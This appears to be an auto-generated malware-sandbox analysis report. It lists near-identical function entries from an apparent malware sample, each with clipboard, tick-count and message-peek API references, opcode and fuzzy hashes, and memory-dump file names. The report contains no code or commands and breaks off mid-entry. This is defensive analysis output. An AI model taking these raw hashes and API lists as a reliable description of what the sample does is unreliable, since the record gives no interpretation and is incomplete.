Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 5c9c2b72be51b70aa27deec8cc23665ab81ed213e6e4c4cd2971b508e5dcec5e
Instruction ID: 4c04fdc7165fda112c5298acd9d59ca972770abd1ef97255e42ea5343d5fc0e4
Opcode Fuzzy Hash: 5c9c2b72be51b70aa27deec8cc23665ab81ed213e6e4c4cd2971b508e5dcec5e
Instruction Fuzzy Hash: C7915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99477F5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036B59 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 4152efedcb160e23dfc9b02a314d1729c36b4b2acddb40351a98deb78685ef44
Instruction ID: 3f6e0c0046a54807aa305b99dc74e4cc9ef4701e07b4e1d602521b0ca4355402
Opcode Fuzzy Hash: 4152efedcb160e23dfc9b02a314d1729c36b4b2acddb40351a98deb78685ef44
Instruction Fuzzy Hash: 01915E32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9987BF5DB38C880C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036BDD Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004D8C0: wcsncpy.LIBCMT ref: 000000014004D920
Part of subcall function 000000014004D8C0: _wcstoi64.LIBCMT ref: 000000014004D963

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64wcsncpy
String ID:
API String ID: 2569467992-0
Opcode ID: f87ec481a2074ef4badbb2acf71ec428c0f87579ce38ebe04a87a760b0091681
Instruction ID: 310da68816022d2f395a8cb8249e363fa1111ffd77674560e673ced1c4c78274
Opcode Fuzzy Hash: f87ec481a2074ef4badbb2acf71ec428c0f87579ce38ebe04a87a760b0091681
Instruction Fuzzy Hash: 9B915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99877F5DB38C880C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037945 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 870826d31740a98d6209a327a95b7040bd5ed271b5c8ac1c9d8e488afb417c82
Instruction ID: ce1a90305023dc823634cd6aa1da2106542fd793ec59f746b14a54ac69ba6d57
Opcode Fuzzy Hash: 870826d31740a98d6209a327a95b7040bd5ed271b5c8ac1c9d8e488afb417c82
Instruction Fuzzy Hash: D1918F32205B4486FB6B8B27E8847EA37A2F74DBE4F544116EB5947AF5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035F11 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 086ffd289459504c26191976d66d6c867d14c9cc80c8189c758c1c19e2efc38b
Instruction ID: 7e30cef1d357f4873b67dbbd1a9af4356abf32d0168d450543e48631e796ea04
Opcode Fuzzy Hash: 086ffd289459504c26191976d66d6c867d14c9cc80c8189c758c1c19e2efc38b
Instruction Fuzzy Hash: 67917F32205B4486FB6B8B27E8847EA77A1F74DBE4F140116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400379F6 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fd1735d872d790d663064549df5dcd728bd6971613557c458419b3d2784512db
Instruction ID: c62091605278a6757e39eef56b6b6011760e0d27ff0232311e90240555053414
Opcode Fuzzy Hash: fd1735d872d790d663064549df5dcd728bd6971613557c458419b3d2784512db
Instruction Fuzzy Hash: FC918F72205B4086FB6B8B27E8847EA37A2F74DBE4F544116EB5947AF5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037E90 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140043740: wcsncpy.LIBCMT ref: 00000001400437FC

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
String ID:
API String ID: 3258626421-0
Opcode ID: a3ae38d64ad13f4894290b0d203f51f300250adfab8c9e8fb37fdd28b6fae48e
Instruction ID: 47cdbfcf2172990dc887e9e9139308dcb70e6126651b978b7c36d9c9483f63bd
Opcode Fuzzy Hash: a3ae38d64ad13f4894290b0d203f51f300250adfab8c9e8fb37fdd28b6fae48e
Instruction Fuzzy Hash: 95915E32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9987BF5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037EDB Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140043740: wcsncpy.LIBCMT ref: 00000001400437FC

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
String ID:
API String ID: 3258626421-0
Opcode ID: df7915481d6d59d55bce6a8d666b3b0dee5c0ed5a3429021fc7dc7811577d730
Instruction ID: 3d8d5a77f8c3e4361e6917f65e58a9a9b8dc32892559261070e86f07219cde5a
Opcode Fuzzy Hash: df7915481d6d59d55bce6a8d666b3b0dee5c0ed5a3429021fc7dc7811577d730
Instruction Fuzzy Hash: 54914E32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9947BF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400384E6 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 52540c5368e37f9a8e3893eaf52f47a135852991c183317c1b45256172240143
Instruction ID: 8902f6bf52f20c69c83cc3e7851e8fe727df86db773a67a4f5e1f990fcbb191a
Opcode Fuzzy Hash: 52540c5368e37f9a8e3893eaf52f47a135852991c183317c1b45256172240143
Instruction Fuzzy Hash: EB91603220574086FB6B8B27E8947EA77A1F74DBE4F540116EB5A87AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036A87 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004C050: SendMessageTimeoutW.USER32 ref: 000000014004C0CD

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 9a1ec16deee6b6468ea6f6327aad9eb74e023beaf74e213289af92dae5848417
Instruction ID: 0a1c4c026d7111384ed78d0c0d56c38e3fc507b24170dd364b6a98779f0ee8b2
Opcode Fuzzy Hash: 9a1ec16deee6b6468ea6f6327aad9eb74e023beaf74e213289af92dae5848417
Instruction Fuzzy Hash: BC915F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB99477F5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036C69 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 1c629df6fc49867ce9e8abcce6d6164a53d0ccaa480d0f4b09a68490d04a7e77
Instruction ID: b9312f37273b6b5fdb8bab85b4cd198ddada168f560dcfde6f9e8eb68c5baa62
Opcode Fuzzy Hash: 1c629df6fc49867ce9e8abcce6d6164a53d0ccaa480d0f4b09a68490d04a7e77
Instruction Fuzzy Hash: 69914F32205B4486EB6B8B27E8847DA77A1F74DBE4F540116EB9947BF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400378AB Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 08641e63baf18133b3a3b09e0af98c67e89fe5a2d6da48081f4d10665ccfa1ae
Instruction ID: 686e9dc5a232d92519d16b12b5a992c7d6eb292536564fec705d2635bfa4bd3d
Opcode Fuzzy Hash: 08641e63baf18133b3a3b09e0af98c67e89fe5a2d6da48081f4d10665ccfa1ae
Instruction Fuzzy Hash: BC918F32605B4086FB6B8B27E8847EA37A2F74DBE4F544116EB5947AF5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037A30 Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7f9188511ce3342afb82d51285b01e5a05390aff2c25f41a378fdefd2820538e
Instruction ID: a58a5ee88b25b7691f97aaee058fff6c251841d0337afd92bb79f5f09c93142d
Opcode Fuzzy Hash: 7f9188511ce3342afb82d51285b01e5a05390aff2c25f41a378fdefd2820538e
Instruction Fuzzy Hash: 20918F32205B4486FB6B8B27E8847EA37A2F74DBE4F544116EB5947AF5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038440 Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7882b6cd2dd70fc44e2ed831b6cadfbbe13d890e1aeeac0b899ce03b12d0e414
Instruction ID: a3f1f90e12905f304e33e52fd868a737e792c07c56117838bccfbfdcc4741279
Opcode Fuzzy Hash: 7882b6cd2dd70fc44e2ed831b6cadfbbe13d890e1aeeac0b899ce03b12d0e414
Instruction Fuzzy Hash: F0916032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB99876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036A4D Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004BC80: GetWindowThreadProcessId.USER32 ref: 000000014004BCE4
Part of subcall function 000000014004BC80: AttachThreadInput.USER32 ref: 000000014004BD14
Part of subcall function 000000014004BC80: SetFocus.USER32 ref: 000000014004BD23
Part of subcall function 000000014004BC80: AttachThreadInput.USER32 ref: 000000014004BFE4

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountThreadTick$AttachInput$ClipboardCloseFocusGlobalMessagePeekProcessUnlockWindow
String ID:
API String ID: 1514730375-0
Opcode ID: 9be0545cde4605745e132e89f1facee40eeca3bea8bf805dc2d0705345c6e66f
